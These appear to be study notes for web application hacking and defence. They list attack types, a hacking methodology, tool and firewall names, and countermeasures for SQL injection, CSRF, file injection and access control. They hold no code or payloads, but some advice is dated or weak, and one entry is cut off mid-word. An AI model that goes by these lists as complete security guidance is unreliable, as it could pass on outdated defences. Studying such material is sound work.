o Directory Traversal o Unvalidated Redirects and Forwards o Waterhole Attack o Cross-Site Request Forgery o Cookie/Session Poisoning o Web Services Attacks
Sensitive Data Exposure Countermeasure
o Do not create or use weak cryptographic algorithms o Generate encryption keys offline and store them securely o Ensure that encrypted data stored on disk is not easy to decrypt
Hacking Methodology
o Footprint web infrastructure o Attack web servers o Analyze web applications o Bypass client-side controls o Attack authentication mechanisms o Attack authorization schemes o Attack access controls o Attack session management mechanisms o Perform injection attacks o Attack application logic flaws o Attack database connectivity o Attack web app clients o Attack web service
How to Defend Against SQL Injection Attacks
o Limit the length of user input o Use custom error messages o Monitor DB traffic using an IDS, WAF o Disable commands like xp_cmdshell o Isolate database server and web server o Always use method attribute set to POST and low privileged account for DB connection o Run database service account with minimal rights o Move extended stored procedures to an isolated server o Use typesafe variables or functions such as IsNumeric() to ensure typesafety o Validate and sanitize user inputs passed to the database
SQL Allows attackers to
o Log into the application without supplying valid credentials o Perform queries against data in the database, often even data to which the application would not normally have access o Modify database contents, or drop the database altogether o Use the trust relationships established between the web application components to access other databases
Attackers use LDAP to Achieve
o Login bypass o Information disclosure o Privilege escalation o Information alteration
Cross-Site Request Forgery countermeasures
o Logoff immediately after using a web application and clear the history o Do not allow your browser and websites to save login details o Check the HTTP Referrer header and when processing a POST, ignore URL parameters
Web Application Hacking Tools
o Metasploit o w3af (http://w3af.org) o HTTrack o WebCopier o WPScan o Instant Source o MileSCAN ParosPro o GNU Wget o cURL o HttpBee
Broken Access Control COuntermeasures
o Perform access control checks before redirecting the authorized user to requested resource o Avoid using insecure Id's to prevent attacker from guessing it o Provide session timeout mechanism o Limit file permissions to authorized users from misuse o Avoid client side caching mechanism o Remove session tokens on server side on user logout
Web Services Architecture
o SOAP: SOAP (Simple Object Access Protocol) is an XML-based protocol that allows applications running on a platform (e.g. Windows Server 2012) to communicate with applications running on a different platform (e.g. Ubuntu) o UDDI: Universal Description, Discovery, and Integration (UDDI) is a directory service that lists all the services available. o WSDL: Web Services Description Language is an XML-based language that describes and traces web services. o WS-Security: WS-Security plays an important role in securing the web services. WS-Security (Web Services Security) is an extension to SOAP and aims at maintaining the integrity and confidentiality of SOAP messages and authenticating the us
Web Application Firewalls
o ServerDefender VP o IBM Security AppScan o Radware's AppWall o QualysGuard WAF o Barracuda Web Application Firewall o ThreatSentry o ThreatRadar o SecureSphere o ModSecurity o SteelApp Web App Firewall o Trustwave Web Application Firewall o Cyberoam's Web Application Firewall o Kerio Control
How to Defend Against File Injection Attacks
o Strongly validate user input o Consider implementing a chroot jail o PHP: Disable allow_url_fopen and allow_url_include in php.ini o PHP: Disable register_globals and use E_STRICT to find uninitialized variables o PHP: Ensure that all file and streams functions (stream_*) are carefully vetted
Broken Authentication and Session Management Countermeasures
o Use SSL for all authenticated parts of the application o Verify whether all the users' identities and credentials are stored in a hashed form o Never submit session data as part of a GET, POST
Countermeasure for Wen Application Hacking
o Web Application Fuzz Testing o Source code review - used to detect bugs and irregularities in the developed web applications. o Encoding Schemes
Web Application Fuzz Testing
this is a black box testing method. It is a quality checking and assurance technique used to identify coding errors and security loopholes in web applications. Huge amounts of random data called 'Fuzz' will be generated by the fuzz testing tools (Fuzzers) and used against the target web application to discover vulnerabilities that can be exploited by various attacks